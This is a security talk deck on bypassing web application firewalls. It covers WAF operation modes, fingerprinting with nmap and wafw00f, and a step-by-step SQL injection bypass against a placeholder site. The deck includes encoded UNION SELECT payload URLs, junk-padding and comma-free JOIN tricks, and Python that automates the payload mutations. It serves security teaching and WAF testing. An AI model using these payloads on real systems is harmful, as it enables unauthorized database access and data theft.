
WAF Bypassing Techniques

Avinash Kumar Thapa, Senior Security Analyst at Network Intelligence India
Bug Hunter on HackerOne
CTF author on Vulnhub.com
Some exploits and PoCs on Exploit-DB as well.
Passionate about web application security and exploit writing.
Agenda
Introduction to Web Applications Firewalls
Operation Modes
Vendors
Fingerprinting WAF
Ways to Bypass WAFs
Practical Cases for Bypassing
Conclusion
Introduction to Web Application Firewalls

Operates at the application layer (OSI layer 7), in front of the web server.

Monitors HTTP/HTTPS, SOAP and XML-RPC web service traffic between clients and servers
and compares it against pre-defined signatures held in a rule database.
The basic goal of a WAF is to monitor and block content that violates a pre-defined policy.
These pre-defined policies describe patterns of user input that are characteristic of an attack.
Understands HTTP and HTTPS traffic far better than a traditional (network-layer) firewall,
which only sees addresses and ports.
Types of Operation Modes
Negative Model
A negative security model recognizes attacks by relying on a database of known attack
signatures (a blocklist).
Example:
Do not allow, on any page, any argument value (user input) that matches a potential XSS
string such as <script>, </script>, String.fromCharCode, etc.

Pros:
Less time to implement.

Cons:
Less protection: anything a signature does not describe is allowed through, which is exactly
what the bypass techniques later in this deck exploit.
Positive Model
A positive security model enforces expected behaviour by learning the application logic and
building a security policy of valid, known-good requests (an allowlist) as users interact with
the application.
Example:
On page news.jsp the parameter id may only contain the characters [0-9] and must be in the
range 0 to 65535.
Equivalently, the page applies an intval()-style check so that only integers are accepted.
Pros:
Better performance (fewer rules).
Fewer false positives.
Cons:
Much more time to implement.
Some vendors provide an automatic learning mode; it helps, but is far from perfect.
In the end you always need a skilled human to review the policies.
Mixed Model

A combination of the positive and negative models: a request must match the allowlist and
must not match any attack signature.
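To make the three modes concrete, here is an added example (not from the original slides) in Python that enforces each policy on the deck's own news.jsp?id= parameter. The three signature patterns in the negative model are constructed for this example and are not a vendor rule set; the positive rule is the slide's "digits only, 0 to 65535".

```python
import re

# Negative (blocklist) model: three constructed signatures in the spirit of the
# slide's "<script>, </script>, String.fromCharCode" example. Not a vendor rule set.
NEGATIVE_SIGNATURES = [
    re.compile(r"<\s*/?\s*script", re.I),
    re.compile(r"String\.fromCharCode", re.I),
    re.compile(r"\bunion\s+select\b", re.I),
]

# Positive (allowlist) model: the slide's rule for news.jsp?id=,
# "characters [0-9], from 0 to 65535".
ID_ALLOWED = re.compile(r"[0-9]{1,5}")


def negative_model(value: str) -> bool:
    """Accept unless a known-bad pattern matches. Anything no signature
    describes is let through, which is the 'less protection' con."""
    return not any(sig.search(value) for sig in NEGATIVE_SIGNATURES)


def positive_model(value: str) -> bool:
    """Accept only what the application is known to need: decimal digits in
    the range 0..65535. Everything else is rejected without needing a signature."""
    return ID_ALLOWED.fullmatch(value) is not None and int(value) <= 65535


def mixed_model(value: str) -> bool:
    """Mixed model: must satisfy the allowlist AND match no signature."""
    return positive_model(value) and negative_model(value)


def evaluate(values):
    """Return {value: (negative_allows, positive_allows, mixed_allows)}."""
    return {v: (negative_model(v), positive_model(v), mixed_model(v)) for v in values}


# Constructed sample values for id=.
SAMPLES = [
    "42",                                   # legitimate
    "70000",                                # out of range, but no signature matches
    "<script>alert(1)</script>",            # XSS, caught by a signature
    "1 union select 1,2",                   # SQLi, caught by a signature
    "1/**/union/**/select/**/1,2",          # same SQLi with comments instead of spaces
]

if __name__ == "__main__":
    for value, (neg, pos, mixed) in evaluate(SAMPLES).items():
        print(f"{value!r:36} negative={neg!s:5} positive={pos!s:5} mixed={mixed}")
```

The last sample is the point of the deck: the negative model's `union\s+select` signature never sees the comment-separated form and lets it through, while the positive model rejects it without knowing anything about SQL.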


Testing Environments
Google Chrome
Mozilla Firefox
Internet Explorer
Opera Browser
Products
F5 BIG IP WAF
Sucuri
Modsecurity
Imperva Incapsula
PHP-IDS (PHP Intrusion Detection System)
Quick Defense
AQTRONIX WebKnight (for IIS, implemented as an ISAPI filter)
Barracuda WAF
Fingerprinting WAF
By cookies added to the HTTP communication
Citrix NetScaler WAF: adds its own cookie to the response [image in original slide]
F5 BIG-IP ASM: adds its own cookie to the response [image in original slide]
By HTTP response
Other WAFs may be detected by the type of HTTP response received when a malicious request is
submitted; the response varies from WAF to WAF. Some common block responses are 403, 406,
419, 500, 501, etc.
Response for F5 BIG-IP [image in original slide]
Request and response for the ModSecurity firewall [images in original slide]
Response for the WebKnight firewall, raw and as rendered in the browser [images in original slide]
Automatic Fingerprinting of WAFs
Using Nmap scripts

nmap -p80 --script http-waf-detect <host>
nmap -p80 --script http-waf-fingerprint <host>

Using wafw00f

python wafw00f.py <URL>
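The manual checks above (a vendor cookie in Set-Cookie, a tell-tale status code or body) are what tools like wafw00f automate. The following is an added example, not code from the slides or from wafw00f: a small Python fingerprinter run over constructed responses to a malicious probe. The cookie-name patterns, the "999 No Hacking" status and the Mod_Security body text are hints commonly associated with those products in public detection tooling; treat them as leads to confirm by hand, not proof of a vendor.

```python
import re

# Constructed fingerprint hints (assumptions for this example, not a vendor spec).
COOKIE_HINTS = {
    "Citrix NetScaler": re.compile(r"^(ns_af|citrix_ns_id|NSC_)", re.I),
    "F5 BIG-IP ASM": re.compile(r"^TS[0-9a-z]{3,}", re.I),
}
BODY_HINTS = {
    "ModSecurity": re.compile(r"mod_?security", re.I),
}
# Status codes the slides list as typical block responses.
BLOCK_STATUSES = {403, 406, 419, 500, 501}


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status, [(header, value)], body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def fingerprint(raw: str):
    """Return a sorted list of WAF guesses for one response to a malicious probe."""
    status, headers, body = parse_response(raw)
    cookie_names = [v.split("=", 1)[0].strip()
                    for name, v in headers if name == "set-cookie"]
    guesses = set()
    for product, pattern in COOKIE_HINTS.items():
        if any(pattern.search(c) for c in cookie_names):
            guesses.add(product)
    for product, pattern in BODY_HINTS.items():
        if pattern.search(body):
            guesses.add(product)
    if status == 999:                      # WebKnight answers "999 No Hacking"
        guesses.add("AQTRONIX WebKnight")
    if not guesses and status in BLOCK_STATUSES:
        guesses.add("unidentified WAF or access control")
    return sorted(guesses)


# Constructed sample responses to the same probe (id=1' ...); not real captures.
RESP_NETSCALER = ("HTTP/1.1 403 Forbidden\r\n"
                  "Set-Cookie: ns_af=31d0; Path=/\r\n"
                  "Set-Cookie: citrix_ns_id=9f2a; Path=/\r\n"
                  "Content-Length: 0\r\n\r\n")
RESP_F5 = ("HTTP/1.1 200 OK\r\n"
           "Set-Cookie: TS01a2b3c4=01deadbeef; Path=/\r\n"
           "Content-Type: text/html\r\n\r\n"
           "<html><body>The requested URL was rejected.</body></html>")
RESP_WEBKNIGHT = "HTTP/1.1 999 No Hacking\r\nContent-Length: 0\r\n\r\n"
RESP_MODSEC = ("HTTP/1.1 406 Not Acceptable\r\n"
               "Content-Type: text/html\r\n\r\n"
               "<html><body>This error was generated by Mod_Security.</body></html>")
RESP_PLAIN_403 = "HTTP/1.1 403 Forbidden\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    for label, raw in [("netscaler", RESP_NETSCALER), ("f5", RESP_F5),
                       ("webknight", RESP_WEBKNIGHT), ("modsec", RESP_MODSEC),
                       ("plain 403", RESP_PLAIN_403)]:
        print(f"{label:10} {fingerprint(raw)}")
```

Note that a 403 on its own (the last sample) is ambiguous: it may be a WAF, a web server ACL or the application itself, which is why the status-code check only fires when no stronger hint is present.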


Techniques to Bypass WAFs

Bypassing WAF For SQL Injection Vulnerabilities


Bypassing WAF for XSS Issues
Bypassing WAF for LFI and RFI vulnerabilities.
General Techniques to bypass WAF
Null Character Injection
Mixed Case
Inline Comments
Chunked Requests
Buffer Overflow
HTTP Parameter Pollution
URL encoding
Keyword Splitting
Replaced Keywords
Ignoring Cookies
Using Data URIs
Header Injection
Bypassing WAF For SQL Injection Vulnerabilities
Example 1 (without WAF)

https://abc.com/index.php?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '1 ' at line 6

Example 1 (with WAF)

https://abc.com/index.php?id=1'
HTTP/1.1 403 Forbidden
or
HTTP/1.1 406 Not Acceptable
or
HTTP/1.1 404 Not Found
or
HTTP/1.1 500 Internal Server Error
or
HTTP/1.1 400 Bad Request
Some recon on the WAF

ModSecurity turned out to be in action.

https://abc.com/index.php?id=1
HTTP/1.1 200 OK

https://abc.com/index.php?id=1%27          (%27 is the URL-encoded single quote)
You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near '1 ' at line 6

Sometimes you need to go one level deeper:

1) Double URL encoding: %2527, which decodes to %27 and then to '
2) Triple URL encoding: %252527 (a very rare case)

These only work when the WAF decodes the value once but the application decodes it again.
https://abc.com/index.php?id=1%27 ORDER BY 1%23
HTTP/1.1 403 Forbidden

Assumptions in mind
Is the ORDER keyword blocked?
Is ORDER BY blocked?
Is there an alternative to ORDER BY?
Are spaces blocked?

Let's try
https://abc.com/index.php?id=1%27 ORDER %23
HTTP/1.1 403 Forbidden

Assumptions in mind
ORDER seems to be blocked; check again whether it really is:

https://abc.com/index.php?id=1%27ORDER%23
HTTP/1.1 200 OK

New assumptions in mind
The ORDER keyword is not blocked.
What is blocked then?

SPACES ARE BLOCKED

https://abc.com/index.php?id=1%27 ORDER by 1 %23
HTTP/1.1 403 Forbidden

https://abc.com/index.php?id=1%27ORDERby1%23
HTTP/1.1 200 OK

No more assumptions: only the spaces are blocked.
(The 200 says nothing about the SQL, 'ORDERby1 is not a valid query; it only shows that the
WAF let the keywords through.)


Techniques to bypass spaces
Using + instead of a space, e.g. order+by+1 (mostly blocked, because + decodes to a space
before the signature is applied)

Using inline comments instead of spaces, /**/, e.g.:

order/**/by/**/1

Using a combination of inline comments and URL encoding instead of spaces, e.g.:
Order/%2a%2a/by/%2a%2a/1
Order%2f**%2fby%2f**%2f1

Using a combination of inline comments, URL encoding and junk characters instead of
spaces, e.g.:
Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1
Order%2f*JUNKCHARACTERS*%2fby%2f*JUNKCHARACTERS*%2f1
Techniques to bypass spaces

Using other whitespace characters: %0a, %0b, %0c, %0d, %a0, %09, %01
(whether %a0 and %01 are accepted as whitespace depends on the server's character set;
verify them against the target)

The query becomes
ORDER%0aby%0a1
ORDER%0bby%0b1
ORDER%0cby%0c1
ORDER%0Dby%0D1
ORDER%A0by%A01
ORDER%0D%0Aby%0D%0A1
https://abc.com/index.php?id=1%27/**/ORDER/**/by/**/1%23

HTTP/1.1 200 OK

Let's suppose the number of columns is 3.

https://abc.com/index.php?id=1%27 UNION SELECT 1,2,3%23
HTTP/1.1 403 Forbidden

Assumptions in mind
Are spaces blocked?
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23
HTTP/1.1 403 Forbidden

Assumptions in mind
Spaces were bypassed using inline comments, still blocked?
Is the UNION keyword blocked?
Is the SELECT keyword blocked?
Are integers blocked?
Are commas blocked?
Is the combination UNION SELECT blocked?
Is SELECT with integers blocked?
Techniques to Bypass
If UNION is blocked

Using MySQL versioned (conditional) comments, which the server executes but which a naive
signature may not read as the keyword:

/*!50000UNION*/
/*!40000UNION*/
/*!00000UNION*/

(MySQL executes the content of /*!NNNNN ... */ only when its version is at least NNNNN, so
/*!00000 ... */ always executes.)

Using URL encoding:

%55nion            (URL encoding of the U)
%2555nion          (double URL encoding)
%55%4e%49%4f%4e    (every character encoded: UNION)
https://abc.com/index.php?id=1%27/**//*!50000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**/SELECT/**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind
Is the UNION keyword blocked?
Is the SELECT keyword blocked?
Are integers blocked?
Are commas blocked?
Is the combination UNION SELECT blocked?
Is SELECT with integers blocked?
https://abc.com/index.php?id=1%27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23
https://abc.com/index.php?id=1%27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind
Is the UNION keyword blocked?
Is the SELECT keyword blocked?
Are integers blocked?
Are commas blocked?
Is the combination UNION SELECT blocked?
Is SELECT with integers blocked?
https://abc.com/index.php?id=1%27/**//*!50000UNION*/1,2,3%23

HTTP/1.1 200 OK

https://abc.com/index.php?id=1%27/**//*!50000SELECT*/1,2,3%23

HTTP/1.1 200 OK

(Each of these is invalid SQL on its own; the 200 only shows that the WAF passed the request.)

Assumptions in mind
The UNION keyword is NOT blocked.
The SELECT keyword is NOT blocked.
Integers are NOT blocked.
Commas are NOT blocked.
Is the combination UNION SELECT blocked?
SELECT with integers is NOT blocked.
Techniques to bypass the combination UNION SELECT
Using a combination of inline comments and URL encoding:
/*!50000%55niOn*/ /*!50000%53eLECT*/

Using whitespace characters and the URL-encoded # comment between the keywords:

Union%23%0aSELECT
Union%23%0bSELECT
Union%23%0cSELECT
Union%23%0DSELECT
Union%23%A0SELECT

Caveat: a MySQL # comment runs to the end of the line, so only a real newline (%0a, also
contained in %0d%0a) terminates it; the other variants are useful for probing the WAF but
will comment out the SELECT on the server.
Techniques to bypass the combination UNION SELECT

Using a "buffer overflow" (not a memory corruption: the aim is to push the second keyword
past the distance, or the number of bytes, that the signature inspects)

UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT

Sometimes the junk needs to be increased, as required, to several hundred characters:

UNION%23<several hundred junk characters>%0ASELECT
Techniques to bypass the combination UNION SELECT
Using the DISTINCT keyword

UNION DISTINCT SELECT

Using the DISTINCTROW keyword

UNION DISTINCTROW SELECT

Putting it together:

https://abc.com/index.php?id=1%27/**/UNION%23<several hundred X characters>%0ASELECT/**/1,2,3%23
HTTP/1.1 200 OK
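The whole walkthrough from the space-bypass slides to the UNION SELECT slides is one loop: mutate the payload, resubmit, read the status code, update the assumptions. Here is an added example (not from the slides, and not ModSecurity) that makes that loop runnable offline. The WAF is a constructed two-rule negative model: it URL-decodes the value once, blocks any literal space, and blocks UNION followed by SELECT within 40 characters (the 40 is an assumption standing in for whatever inspection window a real rule has). The mutations are the deck's own: /**/ for spaces, MySQL versioned comments, and a #-comment of junk ended by %0A; the comment and # semantics are MySQL's.

```python
import re
from itertools import combinations
from urllib.parse import unquote

# Constructed toy negative-model WAF: two illustrative rules, NOT a vendor rule set.
SIGNATURES = [
    re.compile(r" "),                                # any literal space
    re.compile(r"union[\s\S]{0,40}select", re.I),    # UNION ... SELECT within 40 chars
]


def waf_blocks(raw_param: str) -> bool:
    """Decode the query-string value once (as most WAFs do), then match signatures."""
    decoded = unquote(raw_param)
    return any(sig.search(decoded) for sig in SIGNATURES)


def status(raw_param: str) -> int:
    """403 if the toy WAF blocks the value, else 200, mirroring the slides."""
    return 403 if waf_blocks(raw_param) else 200


# --- mutations from the slides ---------------------------------------------

def fill_spaces(payload: str, filler: str = "/**/") -> str:
    """Replace every space with an inline comment (or %0a, %09, ... if preferred)."""
    return payload.replace(" ", filler)


def version_comment(payload: str, keywords=("UNION", "SELECT"), version="50000") -> str:
    """Wrap keywords in MySQL versioned comments: UNION -> /*!50000UNION*/."""
    for kw in keywords:
        payload = re.sub(kw, lambda m: f"/*!{version}{m.group(0)}*/", payload, flags=re.I)
    return payload


def pad_between(payload: str, first="UNION", second="SELECT", junk_len=64) -> str:
    """The slides' 'buffer overflow': push SELECT out of the signature's reach with
    a #-comment full of junk, terminated by an encoded newline (%0A)."""
    junk = "X" * junk_len
    return re.sub(rf"{first}\W+{second}", f"{first}%23{junk}%0A{second}",
                  payload, flags=re.I)


# --- differential probing ----------------------------------------------------

def isolate(fragments):
    """Submit each fragment alone, then each pair of individually-allowed
    fragments, and report what the WAF rejects: the 'assumptions in mind'
    loop made systematic."""
    single = [f for f in fragments if waf_blocks(f)]
    pairs = [(a, b) for a, b in combinations(fragments, 2)
             if a not in single and b not in single and waf_blocks(a + b)]
    return single, pairs


if __name__ == "__main__":
    base = "1%27 UNION SELECT 1,2,3%23"
    print("ORDER BY probe:", isolate(["%27", "%20", "ORDER", "BY", "1", "%23"]))
    print("UNION SELECT probe:", isolate(["UNION", "SELECT", "1%2C2%2C3"]))
    for label, p in [("plain", base),
                     ("/**/ for spaces", fill_spaces(base)),
                     ("+ versioned comments", version_comment(fill_spaces(base))),
                     ("+ 20 bytes of junk", pad_between(fill_spaces(base), junk_len=20)),
                     ("+ 64 bytes of junk", pad_between(fill_spaces(base)))]:
        print(f"{status(p)}  {label:22} {p}")
```

The first probe isolates the space as the only blocked fragment, just as the ORDER BY slides did; the second finds that UNION and SELECT pass alone but not together. Versioned comments still leave the two keywords 14 bytes apart, so the span rule fires; 20 bytes of junk is still inside the window and 64 is not, which is the "increase the junk as required" step.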
Special case: what if commas are blocked?
https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/1,2,3%23

HTTP/1.1 403 Forbidden

Assumptions in mind
The UNION keyword is NOT blocked.
The SELECT keyword is NOT blocked.
Integers are NOT blocked.
Commas are blocked.
The combination UNION SELECT is NOT blocked.
SELECT with integers is NOT blocked.

Time to bypass commas.

Basic bypasses
URL encoding: %2c for ,
Double URL encoding: %252c, decoded to %2c and then to , (only if the application decodes
the value a second time)
Inline comments around the comma: UNION SELECT 1/*!,*/2
Advanced way to bypass commas
Using JOIN

JOIN adds columns in the way UNION adds rows.

Instead of SELECT 1,2,3 we write

SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c

https://abc.com/index.php?id=1%27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/JOIN/**/(SELECT/**/2)b/**/JOIN/**/(SELECT/**/3)c%23

HTTP/1.1 200 OK
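To show that the JOIN construction really yields the same row as SELECT 1,2 without a single comma, here is an added example (not from the slides) that runs the injection against a constructed SQLite table standing in for index.php. SQLite is used because it ships with Python; it accepts /**/ comments and the (SELECT 1)a JOIN (SELECT 2)b form like MySQL, but it has no # comment, so the slides' %23 terminator is replaced by "-- " here.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema and rows standing in for the slides' index.php?id= backend."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(1, "first post"), (2, "second post")])
    return con


def vulnerable_lookup(con: sqlite3.Connection, user_id: str):
    """Deliberately vulnerable: the id parameter is concatenated into the query,
    exactly the bug the slides exploit. Do not write real code like this."""
    sql = "SELECT id, title FROM news WHERE id = '%s'" % user_id
    return con.execute(sql).fetchall()


def join_row(*values: str) -> str:
    """Build 'SELECT * FROM (SELECT v1)a JOIN (SELECT v2)b ...' with no commas.
    Every JOIN adds one column, where a UNION would add one row."""
    parts = [f"(SELECT {v}){chr(ord('a') + i)}" for i, v in enumerate(values)]
    query = "SELECT * FROM " + " JOIN ".join(parts)
    assert "," not in query          # the whole point: nothing for a comma filter to see
    return query


def comma_free_union(con: sqlite3.Connection, *values: str):
    """Inject a row built with JOIN instead of 'SELECT 1,2'. Results are sorted
    because UNION output order is not guaranteed."""
    payload = "1' UNION " + join_row(*values) + " -- -"
    return sorted(vulnerable_lookup(con, payload))


def comma_free_union_no_spaces(con: sqlite3.Connection, *values: str):
    """Same injection with every space replaced by /**/, combining the comma
    bypass with the space bypass from earlier in the deck."""
    payload = ("1' UNION " + join_row(*values) + " -- -").replace(" ", "/**/")
    return sorted(vulnerable_lookup(con, payload))


if __name__ == "__main__":
    con = make_db()
    print(join_row("1", "2", "3"))
    print(comma_free_union(con, "1", "'x'"))
    print(comma_free_union_no_spaces(con, "1", "sqlite_version()"))
```

The second value may be any expression, so in a real engagement `'x'` becomes `version()`, `user()` or a sub-select, all still without a comma in the injected string.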
Similar Approach for other Vulnerabilities
For XSS
For LFI / RFI

DEMO TIME
References
Images in slides 10, 11, 14, 15, 16 and 17 taken from
http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYBALOCH.pdf

Thank
you..!
